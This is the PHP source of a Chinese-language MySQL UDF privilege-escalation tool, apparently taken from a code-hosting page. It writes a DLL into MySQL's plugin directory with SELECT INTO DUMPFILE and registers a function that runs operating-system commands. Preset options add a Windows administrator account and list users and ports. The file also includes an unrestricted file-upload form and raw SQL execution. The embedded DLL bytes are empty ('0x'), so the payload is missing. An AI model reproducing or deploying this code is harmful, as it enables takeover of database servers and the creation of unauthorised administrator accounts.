代码拉取完成,页面将自动刷新
<?php
error_reporting(0);
if (get_magic_quotes_gpc()) {
function stripslashes_deep($value)
{
$value = is_array($value) ?
array_map('stripslashes_deep', $value) :
stripslashes($value);
return $value;
}
$_POST = array_map('stripslashes_deep', $_POST);
$_GET = array_map('stripslashes_deep', $_GET);
$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}
session_start();
if($_GET['action']=='logout'){
foreach($_COOKIE["connect"] as $key=>$value){
setcookie("connect[$key]","",time()-1);
}
header("Location:".$_SERVER["SCRIPT_NAME"]);
}
if(!empty($_POST['submit'])){
setcookie("connect");
setcookie("connect[host]",$_POST['host']);
setcookie("connect[name]",$_POST['name']);
setcookie("connect[pass]",$_POST['pass']);
setcookie("connect[dbname]",$_POST['dbname']);
echo "<script>location.href='?action=connect'</script>";
}
/*
foreach($_COOKIE["connect"] as $key=>$value){
echo $key.":".$value."<br>";
}
*/
if(empty($_GET["action"])){
?>
<?php
exit;
}
$link=@mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["name"],$_COOKIE["connect"]["pass"]);
if(!$link){
echo "连接失败.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
exit;
}else{
echo "</br><h4>Mysql 提权工具 Code by msx2009</h4>";
echo "</br>连接成功 ";
$str=mysql_get_server_info();
echo 'MYSQL版本:'.$str." ";
if($str[2]>=1){
$sql="SHOW VARIABLES LIKE '%plugin_dir%'";
$row=mysql_query($sql);
$rows=mysql_fetch_row($row);
$pa=str_replace('\\','/',$rows[1]);
$path=$_SESSION['path']=$pa."/msxtest.dll";
}else{
$path=$_SESSION['path']='C:/WINDOWS/msxtest.dll';
}
}
$conn=mysql_select_db($_COOKIE["connect"]["dbname"],$link);
if(!$conn){
echo "数据不存在.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
exit;
}else{
echo "数据库--".$_COOKIE['connect']['dbname']."--存在 ";
}
echo '<a href="?action=logout">退出</a>';
echo '<form action="" method="post" enctype="multipart/form-data" name="form1">';
echo "当前路径:<input name='p' type='text' value='".dirname(__FILE__)."\'> ";
echo '<input type="file" name="file">';
echo '<input type="submit" name="subfile" value="上传文件">';
echo'</form>';
if($_POST['subfile']){
$upfile=$_POST['p'].$_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name']))
{
if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){
echo '上传失败';
}else{
echo '上传成功,路径为'.$upfile;
}
}
}
echo '<form action="?action=dll" method="post"/>';
echo '路径目录为';
echo "<input type='text' name='dll' size='40' value='$path'/>";
echo '<input type="submit" name="subudf" value="导出udf"/>';
echo '</form>';
if($_POST['subudf']){
mysql_query('DROP TABLE Temp_udf');
$query=mysql_query('CREATE TABLE Temp_udf(udf BLOB);');
if(!$query){
echo '创建临时表Temp_udf失败请查看失败内容'.mysql_error();
}else{
$shellcode=udfcode();
$query="INSERT into Temp_udf values (CONVERT($shellcode,CHAR));";
if(!mysql_query($query)){
echo 'udf插入失败请查看失败内容'.mysql_error();
}else{
$query="SELECT udf FROM Temp_udf INTO DUMPFILE '".$path."';" ;
if(!mysql_query($query)){
echo 'udf导出失败请查看失败内容'.mysql_error();
}else{
mysql_query('DROP TABLE Temp_udf');
echo '导出成功';
}
}
}
}
echo '<form name="form2" method="post" action="">';
echo '自定义路径:';
echo '<input name="diypath" type="text" id="diypath" size="27" value="C:/WINDOWS/diy.dll">';
echo '<input type="submit" name="Submit2" value="自定义导出">';
echo '</form>';
if(!empty($_POST['diy'])){
$diy=str_replace('\\','/',$_POST['diy']);
$diypath=str_replace('\\','/',$_POST['diypath']);
mysql_query('DROP TABLE diy_dll');
$s='create table diy_dll (cmd LONGBLOB)';
if(!mysql_query($s)){
echo '创建diy_dll表失败'.mysql_error();
}else{
$s="insert into diy_dll (cmd) values (hex(load_file('$diy')))";
if(!mysql_query($s)){
echo "插入自定义文件失败".mysql_error();
}else{
$s="SELECT unhex(cmd) FROM diy_dll INTO DUMPFILE '$diypath'";
if(!mysql_query($s)){
echo "导出自定义dll出错".mysql_error();
}else{
mysql_query('DROP TABLE diy_dll');
echo "成功出自定义dll<br>";
}
}
}
}
echo '自带命令:<br>';
echo '<form action="" method="post">';
echo '<select name="mysql">';
echo '<option value="create function msx returns string soname \'msxtest.dll\'">创建msx</option>';
echo '<option value="select msx(\'net user $msx 123456 /add & net localgroup administrators $msx /add\')">添加超级管理员</option>';
echo '<option value="select msx(\'net user\')">查看用户</option>';
echo '<option value="select msx(\'netstat -an\')">查看端口</option>';
echo '<option value="drop function msx ">删除msx</option>';
echo '</select>';
echo '<input type="submit" value="提交" />';
echo '</form>';
echo '<form action="?action=sql" method="post">';
echo '自定义SQL语句: Example:select msx(\'ipconfig\')<br>';
echo '<textarea name="mysql" cols="100" rows="3"></textarea>';
echo '</br><input type="submit" value="执行" />';
echo '</form>';
echo "执行结果:<br>";
echo '<textarea cols="100" rows="5" id="contactus" name="contactus">';
if(!empty($_POST['mysql'])){
echo "SQL语句:".$sql=$_POST['mysql']."\r\n";
$sql=mysql_query($sql) or die(mysql_error());
while($rows=@mysql_fetch_row($sql)){
foreach($rows as $value){
echo $value;
}
}
}
echo '</textarea><br>';
echo '<hr>';
print("
功能说明:<br>
此udf只内置一个函数msx,用于执行系统命令,执行 select msx('命令')
例如: select msx('net user');
");
function udfcode(){
return "0x";
}
?>
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。
马建仓 AI 助手